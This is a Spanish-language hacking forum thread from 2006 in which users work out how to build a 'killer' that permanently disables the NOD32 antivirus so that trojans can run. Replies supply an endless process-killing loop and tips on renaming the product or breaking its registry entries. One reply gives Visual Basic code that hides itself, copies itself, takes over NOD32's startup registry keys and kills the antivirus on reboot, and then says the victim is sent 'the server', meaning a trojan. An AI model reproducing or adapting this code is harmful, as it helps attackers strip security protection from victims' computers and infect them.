bueno estaba haciendo un killer para nod32 veo que tiene dos procesos nod32kui.exe y nod32krn.exe bueno el problema es que al matar nod32krn vuelve a iniciarse siempre alguien tiene alguna forma de matarlo definitivamente y que nose vuelva a abrir o otra forma de matar este av? desde ya muchas gracias
salu2
Fijate quien es el que lo vuelve a ejecutar ...
Me intriga lo que hace este code
KeWaitForSingleObject(LD->BrainActivity, Executive, KernelMode, 0, 0);
//ESTO NUNCA DEBERIA PASAR!!
KeBugCheck(INSTALL_MORE_MEMORY);
rubeng
Do While lol < 3
lol = lol + 1
If lol = 2 Then lol = 1
DoEvents
"aqui el codigo con el que matas al antivirus o la función que ayas creado"
Loop
eso es un bucle infinito cuando mate al nod32 y vuleva a intentar iniciarse vuleve a realizar el mismo proceso una y otra vez, x ejemplo una app que se inicie con windows prueba hacerlo y con el bucle ese y creo que no iniciaria nod32.
SaluDOS.
muchisimas gracias. tenia en mente algo asi que lo cierre cada vez que se abra o sino que no lo deje abrir.. lo curioso es que cuando cerre el programa no se volvio a abrir mas solo. eso por que paso? otra cosa desaparecio el icono del nod32(cosa que antes no habia logrado) pero me sigue bloqueando si abro un virus, un troyano o cualkier programa de este tipo.
salu2
otra cosa me fije en el administrador de tareas de windows y el nod32krn sigue durante la ejecucion del programa. :-\ maldito nod >:( no hay una forma de que no deje ejecutar el proceso nod32krn.exe?
Cita de: Pseudoroot en 27 Mayo 2006, 17:11 PM
Me intriga lo que hace este code
KeWaitForSingleObject(LD->BrainActivity, Executive, KernelMode, 0, 0);
//ESTO NUNCA DEBERIA PASAR!!
KeBugCheck(INSTALL_MORE_MEMORY);
Estrictamente lo que hace es esperar a que sea señalado el objeto BrainActivity, en este caso por siempre al no tener timeout (el ultimo parametro). Si se llegara a señalar el objeto entonces se tiraria abajo el sistema con un BSOD (Blue Screen of Death).
Citarotra cosa me fije en el administrador de tareas de windows y el nod32krn sigue durante la ejecucion del programa. undecided maldito nod Angry no hay una forma de que no deje ejecutar el proceso nod32krn.exe?
Respuesta:
Claro matando el nod32kui.exe y el nod32krn.exe....no ves el icono..., desaparece el icono porque esta cerrada completamente la aplicación y que porque se te inicio solo? ( ni idea ) SaluDOS.
si pero haciendo lo que me dijiste use el bucle ese y sigue estando el proceso. me va a volver loco no hay algun codigo para que no permita iniciar ese proceso durante la ejecucion del programa?
en mi pc...no vulve a iniciar nod32...sera que la manera que estas usando para matar los procesos no es la adecuada ;)
hola people! miren yo hice esto para cagar al nod! le cambias el nombre y lo finalizas y listo no se inicia mas! o si no cambien la lalve del registro y listo, cambien cualkiera y el nod se caga y no sirve mas!
PD: no me quedo claro lo que hace tu codigo Eternal Idol lo unico que entendi es que te tira el error ese y uqe te hace, te caga la memoria RAM o el disco o solo te asusta el error (osea que tira error pero no hace nada grave) Gracias y salu2
Sancho.Mazorka :P
Cita de: Sancho.Mazorka en 28 Mayo 2006, 00:00 AMPD: no me quedo claro lo que hace tu codigo Eternal Idol lo unico que entendi es que te tira el error ese y uqe te hace, te caga la memoria RAM o el disco o solo te asusta el error (osea que tira error pero no hace nada grave) Gracias y salu2
Nada, te reinicia la maquina despues de dar un pantallazo azul; es una broma ese codigo.
no el nod no vuelve a iniciar pero el proceso nod32krn.exe sigue activo y si abro un troyano o algo me lo bloquea no lo deja ejecutar no dice nada del nod pero no lo deja ejecutar
weno mi idea es reemplazarnos por la entrada al registro del nod32 y luego la proxima vz q se prenda el pc matar los archivos (q no van a estar en uso hahaha)
Private Sub Form_Load()
App.TaskVisible = false
If App.PrevInstance then
end
end if
FileCopy App.ExeName + ".exe" , "c:\jeje"
Set shell = CreateObject("WScript.Shell")
Set fso = CreateObject("Scripting.FileSystemObject")
shell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\la entrada del nod krn" , "C:\jeje.exe"
shell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\la entrada del nod kui" , "C:\jeje.exe"
If fso.FileExists("C:\windows\the shredder.dll") Then
kill 'el nod32krn y el otro, tbn podrias borrarle el uninstall para 'dejar basura en su pc...
'a estas alturas el nod32 ya va a estar muerto xD
End
Else
Open "c:\windows\the shredder.dll" For Output As #1
Print #1, "jejeje, si existo realiza la acción, si no no"
Close #1
End
End If
End Sub
asi al otro dia le mandas el server y hacke mate...
salu2
bueno ya logre hacerlo gracias a todos en especial a krnl64 que desensamblo el nod32krn y me dijo a que archivos estaba ligado. gracias a todos
salu2
Cita de: rubeng en 29 Mayo 2006, 01:46 AM
bueno ya logre hacerlo gracias a todos en especial a krnl64 que desensamblo el nod32krn y me dijo a que archivos estaba ligado. gracias a todos
salu2
Permiteme que ponga en duda que lo haya "desensamblado".
Gorky, no dudes tanto.
No creas que algo que tu no sepas hacer sea imposible.
Salu2